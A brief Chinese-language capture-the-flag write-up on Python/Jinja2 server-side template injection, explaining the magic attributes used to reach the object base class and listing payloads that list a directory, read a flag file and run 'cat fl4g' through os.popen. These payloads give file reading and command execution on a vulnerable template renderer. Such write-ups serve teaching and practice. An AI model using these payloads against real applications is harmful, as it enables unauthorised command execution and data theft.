1.打开环境,审计代码
2.考点是python404模板注入,几种常用于ssti的魔术方法。
__class__ 返回类型所属的对象
__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__base__ 返回该对象所继承的基类
// __base__和__mro__都是用来寻找基类的
__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__ 类的初始化方法
__globals__ 对包含函数全局变量的字典的引用
__builtins__ builtins即是引用,Python程序一旦启动,它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于builtins却不用导入,它在任何模块都直接可见,所以可以直接调用引用的模块
3.获取基类的几种方法
[].__class__.__base__
''.__class__.__mro__[2]
().__class__.__base__
{}.__class__.__base__
request.__class__.__mro__[8] //针对jinjia2/flask为[9]适用
或者
[].__class__.__bases__[0] //其他的类似
4.读取基类后,会返回字典一样的东西,需要注意的是file一般在40,os一般在71
payload:
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}#另一种姿势
参考文章:Python-模板注入